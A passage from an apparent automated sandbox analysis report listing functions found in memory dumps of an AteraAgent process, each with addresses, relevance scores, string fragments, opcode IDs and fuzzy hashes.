                                                                                                                                                                                                                                                                                                • String ID: 7uR$(7uR$X7uR$x6uR$x6uR$x6uR$x6uR$x6uR$6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-790053882
                                                                                                                                                                                                                                                                                                • Opcode ID: 83e42956c5134d127b7470ece9a76062b731ceebd060872e8a31caeb395a0a66
                                                                                                                                                                                                                                                                                                • Instruction ID: dd4f00abdcaa0cd8453bbb5d6505abf4ea1b894a986ba3adf5ca4c6e342039e6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83e42956c5134d127b7470ece9a76062b731ceebd060872e8a31caeb395a0a66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85A25B70A09A1D8FDBA9EF54C8A4BA8B3A1FF58305F5140FDD01ED7295CA35AA81CF11
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59F5C7 Relevance: 10.2, Strings: 7, Instructions: 1465COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: "wR$),_H$@"wR$H"wR$x6uR$x6uR$x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2061390152
                                                                                                                                                                                                                                                                                                • Opcode ID: e339c7e4fde66db6ccb7e28e4678c1455938cf169135ccf25841a8ceaf7c5d92
                                                                                                                                                                                                                                                                                                • Instruction ID: 8ce87fdb7df88e5346e7130b5769724d6219d1ca07b65260e1e7ca7922ed9b09
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e339c7e4fde66db6ccb7e28e4678c1455938cf169135ccf25841a8ceaf7c5d92
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91A29371B18A4D4FEBD9EB6884A1AA973A1FF68740F5500B9D00DC72DBDE24BD428B41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384C41 Relevance: 9.1, Strings: 7, Instructions: 398COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: [uR$ [uR$ [uR$ [uR$([uR$([uR$[<N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-4279637259
                                                                                                                                                                                                                                                                                                • Opcode ID: 711634d785ec389c416a85e50e7050bc3c138b859a618a63d7ea8fca6f97ca6f
                                                                                                                                                                                                                                                                                                • Instruction ID: 658172a5e1aad410f46069c1c6a30e6546f0157865c640310a06eb29cc77b526
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 711634d785ec389c416a85e50e7050bc3c138b859a618a63d7ea8fca6f97ca6f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3D1C571E0AA4D8FE7A4EFA8C4647A977B1FF55300F4201BED00DD72A2CA356A85CB01
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384E45 Relevance: 5.2, Strings: 4, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: [uR$ [uR$ [uR$[<N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-340479917
                                                                                                                                                                                                                                                                                                • Opcode ID: 3f6110084ca1fb4dd4145fbcf85d1760245d2ca9c0fca56f3db8f87ff34e9650
                                                                                                                                                                                                                                                                                                • Instruction ID: ae2dd0edc5f1f585320dd29d513849599bf548254f9840e38e275e76b97364c5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f6110084ca1fb4dd4145fbcf85d1760245d2ca9c0fca56f3db8f87ff34e9650
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B51A171E0AA4E8FD7A8EFA4C4647A9B7B1FF55700F42007DD00DD72A2CA396A85CB01
                                                                                                                                                                                                                                                                                                Function 00007FFD9B391D48 Relevance: .5, Instructions: 490COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c84bb7f0ef6d86c3328f5327a19fd897e013fbdd95b0397b6043ace2e840207b
                                                                                                                                                                                                                                                                                                • Instruction ID: 2ab53ee5104205b76ead7349614dc1e52283beeba82633382591ec31bf3ff6f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c84bb7f0ef6d86c3328f5327a19fd897e013fbdd95b0397b6043ace2e840207b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F1A230A1DB898FD769EB69C490666B7E1FF99300F04457DE48AC3291DB74E941CB82
                                                                                                                                                                                                                                                                                                Function 00007FFD9B391CE0 Relevance: .4, Instructions: 437COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 518b0f990122a4181a4fd9700cf5367c34bdd9b3849b4969a61c027101c01d1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 63111f49a91842465330a79565f43a8bf692789816123ca618d27e7313823aaf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 518b0f990122a4181a4fd9700cf5367c34bdd9b3849b4969a61c027101c01d1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0D13D21B1EF894FE769E76888657B67BE1EF96300F0541BED08AC71E7DD18AC068341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39B606 Relevance: .3, Instructions: 297COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 80a678fe7ddc79838f6da1d521e8a1ee62a14016137f7189234ec2a5f93afe54
                                                                                                                                                                                                                                                                                                • Instruction ID: 81fb0e1570586e67b946d29788c5a2944ef4f35a547e31197f7ec5a8a530fe35
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80a678fe7ddc79838f6da1d521e8a1ee62a14016137f7189234ec2a5f93afe54
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFB1F875E09A1D8FDB68EF58D8A5BA8B7B1FF58300F1141ADD00DE72A1DA356A81CF40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39B610 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 08b1723632f1b5529b0f14d996649f1d02ce1b8f36db43273567de165102f19b
                                                                                                                                                                                                                                                                                                • Instruction ID: e6bc759377f918edf76f0057e0ba606d5c62485348b72d426524c13c63108580
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08b1723632f1b5529b0f14d996649f1d02ce1b8f36db43273567de165102f19b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3810975E1991D8FDB68EB58C855BACB7F1FF58301F0101A9D04DE32A1DA34AA85CF40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B383466 Relevance: 20.4, Strings: 16, Instructions: 382COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: [uR$([uR$0[uR$8[uR$@[uR$H[uR$P[uR$X[uR$`7uR$h7uR$h[uR$p7uR$p[uR$x6uR$x7uR$x[uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1236815706
                                                                                                                                                                                                                                                                                                • Opcode ID: 58606379543aca220c57be7d64c862851ffa5cd3cb4c277621862e3c054ef7d8
                                                                                                                                                                                                                                                                                                • Instruction ID: b288a8a99ecc5f5993a0d5354ba38ff0a4b183f09c9c28a64fbd1c4ecbb491a9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58606379543aca220c57be7d64c862851ffa5cd3cb4c277621862e3c054ef7d8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DD1C4A1F09A4D4FE7D4EF6888A56A8BBB1EF65340F4101FAD40CC72A6DE355E85CB01
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59A361 Relevance: 13.7, Strings: 10, Instructions: 1195COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: !wR$(!wR$0!wR$8!wR$@!wR$H!wR$ wR$ wR$ wR$ wR
                                                                                                                                                                                                                                                                                                • API String ID: 0-629735081
                                                                                                                                                                                                                                                                                                • Opcode ID: a1cb6bf4e84481b4c902ecc92e64f1a6d03669d256d8273d7b068be33e3ce35e
                                                                                                                                                                                                                                                                                                • Instruction ID: 156f63d8d3102b35e4f2774295336082d0c9595a2e0d096a257e3efc5102c560
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1cb6bf4e84481b4c902ecc92e64f1a6d03669d256d8273d7b068be33e3ce35e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E822B20B1DA4E4FEBE9EB28846067973E1FF99340F5500B9E40DC72E7DE28E9418751
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38CFC8 Relevance: 10.7, Strings: 8, Instructions: 659COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0:uR$8:uR$@:uR$H:uR$P:uR$X:uR$`:uR$`:uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1584323078
                                                                                                                                                                                                                                                                                                • Opcode ID: a148d6021df980f8b9d707d96a07d58a69101b81c694e5e44dd0848314721b12
                                                                                                                                                                                                                                                                                                • Instruction ID: 741c461354ea9da19d50bc8d991cb3a911df3d11dd10f9ca4a45597d7cb60831
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a148d6021df980f8b9d707d96a07d58a69101b81c694e5e44dd0848314721b12
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C12F434B2DB4D8FD768EA5C84A553AB7E1EF95700F11467DE48AC32A6DE34EC028742
                                                                                                                                                                                                                                                                                                Function 00007FFD9B395399 Relevance: 10.4, Strings: 8, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: X9uR$XuR$`9uR$`9uR$`uR$huR$huR$huR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3292316135
                                                                                                                                                                                                                                                                                                • Opcode ID: 82d131b2e17733dcc31fc0163e72b520d880b88b0e5ecd5348ba97e5601de155
                                                                                                                                                                                                                                                                                                • Instruction ID: 5cd914ff9979623101099c3620c00a6d9d2a4b0b861dd1b3f84750b65333bc35
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82d131b2e17733dcc31fc0163e72b520d880b88b0e5ecd5348ba97e5601de155
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74B14822B0EB4E4FF7A9EAAC58A16B577D1EF55350B4600BED409C71E3DD19ED828340
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3863B2 Relevance: 9.1, Strings: 7, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (8uR$08uR$88uR$@8uR$H8uR$x6uR$x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2105576337
                                                                                                                                                                                                                                                                                                • Opcode ID: 12f4ef559f32ebbbab0d68ffe032cda52000e8c4fb99768666d7b6939f20e92e
                                                                                                                                                                                                                                                                                                • Instruction ID: b0f2841dc3e1513880fa531d6c6f3694db8f0912c1fab38594e9b8f310d51213
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12f4ef559f32ebbbab0d68ffe032cda52000e8c4fb99768666d7b6939f20e92e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAB13D70E09A1D8FDBA8EB98C4657ADB7B1EF59300F5181BEC00DD7291CA356A85CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B385D3F Relevance: 7.8, Strings: 6, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8uR$x6uR$x6uR$x6uR$x6uR$6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1169809776
                                                                                                                                                                                                                                                                                                • Opcode ID: 88fecaee7cf95617fdc7ee5ce9268edb01c6e9af89d7d4c38c49216a5f05b639
                                                                                                                                                                                                                                                                                                • Instruction ID: 8472fd3467779d3f7023420483592c3b2e5049e275e54d0f45ee8d91935d56c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88fecaee7cf95617fdc7ee5ce9268edb01c6e9af89d7d4c38c49216a5f05b639
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4691D370E09A4D8FDB98EFA8C491AE9B7F1FF65700F4101BAD408D7295CA34AD86CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38CC29 Relevance: 6.6, Strings: 5, Instructions: 361COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 13x$2;x$3Cx$4Kx$x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-854666998
                                                                                                                                                                                                                                                                                                • Opcode ID: e24f2cf311085a5f36a2ff8b99c4cb2e58d5c72064fceadf56e0151038b39d30
                                                                                                                                                                                                                                                                                                • Instruction ID: 73f3820571e08793076b05126572574582971f47e03ec474089d973d60291c1e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e24f2cf311085a5f36a2ff8b99c4cb2e58d5c72064fceadf56e0151038b39d30
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BA12726B1ED5A8FE764BBACA4265E877D0FF95321B4501BBD049C71E3CE24BC468381
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38BAED Relevance: 6.4, Strings: 5, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: uR$(uR$89uR$@9uR$H9uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3821665678
                                                                                                                                                                                                                                                                                                • Opcode ID: 47f5162f2b0e1e2c201dd9224e6012f869b73e8ced4cc0edb46e6f7a38ddf6fa
                                                                                                                                                                                                                                                                                                • Instruction ID: f9ba46ff79f7bed2f5e20a0d4f9b8b535896bbd21af452020f7f1e53a8ddd067
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47f5162f2b0e1e2c201dd9224e6012f869b73e8ced4cc0edb46e6f7a38ddf6fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57417371F0EA8E4FE759EBA888617D5BBA0FF55340F4402FAD058C72E3ED2569418741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3873E1 Relevance: 5.3, Strings: 4, Instructions: 324COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: [uR$[uR$[uR$[uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1917810969
                                                                                                                                                                                                                                                                                                • Opcode ID: 844a4cd4245eacd9c203e0f361a0b0cd5558c3faa74a4b31aae040c7af2ad458
                                                                                                                                                                                                                                                                                                • Instruction ID: a60a55617589beb2230a000b1842e644e0a5bd8623c465b443b18ad34a49bd06
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 844a4cd4245eacd9c203e0f361a0b0cd5558c3faa74a4b31aae040c7af2ad458
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADB11B70E09A1D8FDB98EF98C495BADB7B2FF59300F5541A9D00DE72A5CA34A981CF01
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59C671 Relevance: 4.0, Strings: 3, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ?$_$p!wR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2081416051
                                                                                                                                                                                                                                                                                                • Opcode ID: 78b37a8081af8578e8e6f19c7498ffe1a1b916fe68d7932ac400e9a598be7586
                                                                                                                                                                                                                                                                                                • Instruction ID: e6bccb05a25cb2b410c71e39788ad0ddafa43463e5c5017aad35f8468c75c433
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78b37a8081af8578e8e6f19c7498ffe1a1b916fe68d7932ac400e9a598be7586
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEB1E770A0961D8FDBAADF18C855BA8B7B5FB59301F4141EAE40DE72A1CB756B80CF40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B388D32 Relevance: 4.0, Strings: 3, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ([uR$8uR$8uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-349971988
                                                                                                                                                                                                                                                                                                • Opcode ID: d19ae7668c2c8e0901560dec3a26ec5fbce014ff5e0a4e6c73fe8b20759940d5
                                                                                                                                                                                                                                                                                                • Instruction ID: eef8d021115777e1e484cde2062f3f8da4568124fd314b60c00a14bfb26fe71c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d19ae7668c2c8e0901560dec3a26ec5fbce014ff5e0a4e6c73fe8b20759940d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80719370E09A5D8FDB95EBA8C864BE97BF1FF5A300F0101AED00DD72A2CA395945CB11
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3880DD Relevance: 4.0, Strings: 3, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: X[uR$X[uR$`[uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2002013542
                                                                                                                                                                                                                                                                                                • Opcode ID: 57b7c09f431cbd8448480fd24b9121edbc5445cc9e72701605805e5c426cd87d
                                                                                                                                                                                                                                                                                                • Instruction ID: 28beb059f34e321b4637a82128f133715fc174c9b362d82833f6b7af13a33a3c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57b7c09f431cbd8448480fd24b9121edbc5445cc9e72701605805e5c426cd87d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46812D70E09A1D8FDBA8EFA4C8657EDB6B0FF55300F5101BED009E72A1DA345A85CB51
                                                                                                                                                                                                                                                                                                Function 00007FFD9B385B6A Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR$x6uR$6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1746995022
                                                                                                                                                                                                                                                                                                • Opcode ID: 8bf278b8c223f21608631848dce44dd5b6b6d12a349e90c5a45fa5a9860b6f03
                                                                                                                                                                                                                                                                                                • Instruction ID: 81af667950bd72ea05d3b1ef4b1d91d66c10d31ebcfca058379a838c2569c42d
